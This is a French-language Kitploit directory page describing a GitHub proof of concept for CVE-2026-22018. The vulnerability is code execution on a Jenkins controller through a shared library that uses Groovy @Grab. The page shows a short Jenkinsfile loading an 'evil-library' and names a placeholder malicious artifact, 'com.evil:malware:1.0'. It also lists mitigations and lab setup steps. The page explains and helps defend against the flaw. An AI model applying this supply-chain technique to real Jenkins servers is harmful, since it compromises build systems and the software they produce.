Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC pour CVE-2026-22018, une RCE critique dans Jenkins Pipeline Shared Library via Groovy @Grab, démontrant l'injection de code dans la chaîne d'approvisionnement et les étapes d'atténuation. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebDevSecOpsSécurité de la Chaîne Logistique
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC pour CVE-2026-22018, une RCE critique dans Jenkins Pipeline Shared Library via Groovy @Grab, démontrant l'injection de code dans la chaîne d'approvisionnement et les étapes d'atténuation.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 16 joursPas encore vérifié

CVE-2026-22018 – Exécution de code de la bibliothèque partagée Jenkins Pipeline via @Grab

Code du programme (pipeline Groovy)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Exécution de code à distance de la bibliothèque partagée Jenkins Pipeline

Severity: Critical

Vue d'ensemble

Un pipeline Jenkins charge une bibliothèque partagée depuis une source qui n'est pas entièrement fiable. La bibliothèque utilise l'annotation @Grab pour télécharger des artefacts Maven externes, qui peuvent inclure une classe malveillante exécutant du code sur le contrôleur Jenkins lors de la compilation Groovy.

Détails de la vulnérabilité

  • Type: Injection de code / Chaîne d'approvisionnement
  • Impact: Compromission totale du contrôleur Jenkins.
  • Cause racine: L'annotation @Grab de Groovy récupère et charge des JAR arbitraires au moment de l'exécution ; les bibliothèques partagées ne sont pas isolées (sandbox).

Démonstration de l'exploit

Configurez un pipeline avec une bibliothèque non fiable qui contient @Grab('com.evil:malware:1.0') dans son vars/evilStep.groovy. Lorsque le pipeline s'exécute, l'initialiseur statique du JAR malveillant s'exécute.

Atténuation

  • N'utilisez les bibliothèques partagées qu'à partir de dépôts SCM fiables et signés.
  • Désactivez @Grab via les paramètres de sécurité du sandbox Groovy.
  • Utilisez l'option de pipeline “Load implicitly” avec précaution.

Installation et utilisation

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
Télécharger l’outil